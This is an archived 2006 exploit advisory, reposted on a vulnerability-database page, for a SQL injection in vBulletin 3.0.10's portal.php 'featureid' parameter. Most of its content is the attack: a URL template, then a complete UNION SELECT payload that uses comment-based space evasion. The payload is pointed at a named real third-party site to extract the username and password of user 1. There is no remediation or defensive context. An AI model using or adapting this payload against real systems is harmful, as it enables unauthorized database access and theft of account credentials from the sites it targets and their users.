Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:12919
HistoryJun 01, 2006 - 12:00 a.m.

vBulletin 3.0.10 Version SQL Injection

2006-06-0100:00:00
vulners.com
11

######################################################

vBulletin 3.0.10 Version SQL Injection

SpC-x

######################################################

Credit : SpC-X

Site : http://www.Cyber-security.org

######################################################

Code :

http://www.target.com/path/portal.php?id=54&a=viewfeature&featureid=[SQL]

Example :

http://ckknight.wowinterface.com/portal.php?id=54&a=viewfeature&featureid=99999/**/UNION/**/SELECT/**/0,1,2,3,4,username,6,7,8,9,10,11,12,password/**/from/**/user/**/where/**/userid=1/*

/SpC-x


Get your free email from http://mymail.bsdmail.com